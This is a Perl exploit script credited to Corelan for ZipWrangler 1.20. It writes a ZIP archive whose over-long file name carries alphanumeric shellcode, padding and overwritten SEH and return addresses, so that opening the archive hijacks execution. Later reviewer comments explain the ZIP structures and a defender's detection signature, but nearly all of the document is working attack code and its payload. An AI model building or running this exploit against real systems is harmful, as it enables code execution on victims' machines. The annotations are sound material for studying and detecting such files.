#!/usr/bin/perl
# Title:ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author: TecR0c & Sud0
# Date: April 24th, 2010
# Corelan Reference:http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to:Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# What this script does: it writes a single-entry ZIP archive ("wrangler.zip")
# whose one member has a 4168-byte file name.  The three ZIP structures below
# (local file header, central directory header, end-of-central-directory
# record) are all internally consistent, so a strict ZIP parser accepts the
# file; the only anomalous property is the size of the name field.  A ZIP
# reader that copies a file name into a fixed-size buffer without checking the
# length field against that buffer is what the over-long name exercises.
# NOTE(review): this script runs without strict/warnings; the file is written
# through a bareword handle opened with 2-arg open() and no error check, and
# the old file is removed via the shell ("del").  Hygiene issues only; they do
# not change what the archive contains.

print "|-------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________________/ /___ _____ / /________ _____ ___ |\n";
# NOTE(review): the "<code>"/"</code>" fragments in the next banner line look
# like a rendering artefact (backticks of the original ASCII art turned into
# HTML tags by whatever produced this copy); the banner is cosmetic output only.
print "|/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \|\n";
print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / /|\n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800|\n";
print "|security@corelan.be|\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]---|\n";
print "[+] ZipWrangler 1.2 (.zip) SEH exploit\n";

# Local File Header (30 bytes).  All multi-byte fields are little-endian as in
# the ZIP specification.  The CRC32 and both size fields are zero, i.e. the
# member carries no data at all; the file name that follows the header is the
# only variable-length content.
my $ldf_header = "\x50\x4B\x03\x04". # local file header signature "PK\x03\x04"
"\x14\x00". # version needed to extract (2.0)
"\x00\x00". # general purpose bit flag
"\x00\x00". # compression method (0 = stored)
"\xB7\xAC". # file last modification time (DOS format)
"\xCE\x34". # file last modification date (DOS format)
"\x00\x00\x00\x00". # CRC32 (zero: no member data)
"\x00\x00\x00\x00". # compressed size (zero)
"\x00\x00\x00\x00" . # uncompressed size (zero)
"\x48\x10" .# file name length: 0x1048 = 4168 = length($payload) built below.
            # This is the field a safe extractor must bound-check before
            # copying the name.  The "E4 0F" (0x0FE4 = 4068) in the original
            # comment appears to be a leftover from an earlier payload size;
            # the bytes written are 0x1048.
"\x00\x00"; # extra field length

# Central Directory File Header (46 bytes).  It repeats the local header's
# fields (same version, flags, timestamps, zero CRC/sizes and the same
# 0x1048 name length) and is followed in the archive by a second copy of the
# 4168-byte name, so the two views of the entry agree with each other.
my $cdf_header = "\x50\x4B\x01\x02". # central directory header signature "PK\x01\x02"
"\x14\x00".# version made by
"\x14\x00".# version needed to extract
"\x00\x00".# general purpose bit flag
"\x00\x00".# compression method (0 = stored)
"\xB7\xAC".# file last modification time
"\xCE\x34".# file last modification date
"\x00\x00\x00\x00". # CRC32 (zero)
"\x00\x00\x00\x00".# compressed size (zero)
"\x00\x00\x00\x00".# uncompressed size (zero)
"\x48\x10". # file name length: 0x1048 = 4168, same as in the local header
"\x00\x00". # extra field length
"\x00\x00". # file comment length
"\x00\x00". # disk number where file starts
"\x01\x00". # internal file attributes
"\x24\x00\x00\x00". # external file attributes
"\x00\x00\x00\x00"; # relative offset of local file header (0: first byte of the archive)

# End Of Central Directory record (22 bytes).  The two 32-bit values are
# derived from the sizes above and are exact:
#   size of central directory   = 0x1076 = 4214 = 46 (CDF header) + 4168 (name)
#   offset of central directory = 0x1066 = 4198 = 30 (LFH)        + 4168 (name)
# so the archive parses cleanly end to end; nothing but the name length is
# out of the ordinary.
my $eofcdf_header = "\x50\x4B\x05\x06". # end of central directory signature "PK\x05\x06"
"\x00\x00". # number of this disk
"\x00\x00". # disk where central directory starts
"\x01\x00". # number of central directory records on this disk
"\x01\x00". # total number of central directory records
"\x76\x10\x00\x00". # size of central directory in bytes (central directory header size + payload)
"\x66\x10\x00\x00". # offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"; # ZIP file comment length

# Author's notes on how the overwritten SEH record is used (kept verbatim):
#mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
#so EDX=0000, next instruction TEST EDX,EDX/ Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
#the jump will take us to a retn (so we are out from handler routine) --> come back to execution
#0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
#bingo , after \xEB\x06 we are in our \xcc
# shell = message box eax e

# Alphanumeric payload; per the author's note above it is a message-box
# payload.  Only its length matters for the layout below: the padding after it
# is computed so that the first 4080 bytes of $shellcode are always the same
# size regardless of how long $shell is.
my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
"ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
"lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
"JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
"MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
"dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
"IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
"4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
"NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
"iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
"h5ZA";

# Byte layout of the over-long file name (offsets within $shellcode, total
# 4164 bytes; $payload appends ".txt" to reach 4168):
#   0      .. 4079 : "AA" + $shell + "A" padding up to exactly 4080 bytes
#   4080   .. 4083 : "\x0C\xFD\xFD\x7F"  (0x7FFDFD0C; see author's SEH note)
#   4084   .. 4087 : "\x90" x 4
#   4088   .. 4091 : "\x5b\x02\xe9\x77"  (0x77E9025B, rpcrt4.dll per author's note)
#   4092   .. 4099 : "\x90" x 8
#   4100   .. 4104 : "\x83\xC0\x16\xFF\xE0"  (5-byte stub)
#   4105   .. 4163 : "\xcc" x 59  (INT3 breakpoints; the author's note says
#                    execution is expected to land here)
# From a defender's view: a file name field of ~4 KB, mostly "A"s followed by
# a handful of pointer-sized non-printable values at offset 4080, is the
# signature of this file; a parser that rejects or truncates name lengths
# beyond a sane bound never reaches the overwrite.
my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x5b\x02\xe9\x77" . "\x90" x 8 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;
my $filename="wrangler.zip";
# The entry's "file name": 4164 payload bytes plus ".txt" = 4168 = 0x1048,
# matching the name-length fields in both headers.
my $payload = $shellcode . ".txt";
print "Size : " . length($payload)."\n";   # prints 4168
print "Removing old $filename file\n";
# NOTE(review): shell invocation with an interpolated name; $filename is a
# constant here, so nothing untrusted reaches the shell, but unlink() would
# avoid the shell entirely.
system("del $filename");
print "Creating new $filename file\n";
# NOTE(review): 2-arg open() with a bareword handle and no "or die"; a failed
# open is silently ignored and the later print goes nowhere.  No binmode()
# either: on Windows (the stated platform) the default layer translates 0x0A,
# but none of the bytes written below is 0x0A, so the output is unaffected.
open(FILE, ">$filename");
# Archive = LFH + name + CDF header + name + EOCD, in exactly the order and
# with exactly the sizes the EOCD offsets above assume.
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);